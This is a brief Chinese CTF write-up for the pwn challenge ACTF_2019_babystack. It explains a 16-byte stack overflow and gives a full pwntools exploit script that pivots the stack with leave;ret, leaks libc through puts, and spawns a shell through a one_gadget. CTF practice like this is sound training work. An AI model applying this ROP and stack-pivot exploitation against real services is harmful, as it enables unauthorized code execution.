0%

ACTF_2019_babystack

buuoj刷pwn题之ACTF_2019_babystack

checksec

漏洞明显,溢出rop,可溢出16个字节

main

栈迁移到变量s上,然后leak,onegadget一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#coding=utf8

from PwnContext import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# functions for quick script
s = lambda data :ctx.send(str(data)) #in case that data is an int
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))

ctx.binary = './ACTF_2019_babystack'
ctx.remote = ('0.0.0.0', 0)
ctx.remote_libc = '../../libc/libc-2.27.so'
ctx.debug_remote_libc = True
rs()
# rs('remote')
# print(ctx.libc.path)

size = 0xe0
start = 0x4008F6
leave_ret = 0x400a18
format_str = 0x400B58
pop_rdi_ret = 0x400ad3
pop_rsi_r15_ret = 0x400ad1


sla('>', str(size))
ru('saved at ')
stack_addr = int(ru('\n'), 16)
leak('stack_addr', stack_addr)

pay = '' # ROP
pay += p64(stack_addr) # rbp
pay += p64(pop_rdi_ret) + p64(ctx.binary.got['puts'])
pay += p64(ctx.binary.plt['puts'])
pay += p64(start)
pay += '\x00' * (size - len(pay) - 0x10) + p64(stack_addr) + p64(leave_ret)

#dbg('b *' + hex(start))
#raw_input()
s(pay)

ru('Byebye~\n')
puts_addr = uu64(ru('\n'))
libc_base = puts_addr - ctx.libc.sym['puts']
onegadget = libc_base + 0x4f322

leak('puts', puts_addr)
leak('libc_base', libc_base)
leak('onegadget', onegadget)

sla('>', str(size))

pay = '\x00' * (size - 8) + p64(onegadget)
s(pay)


irt()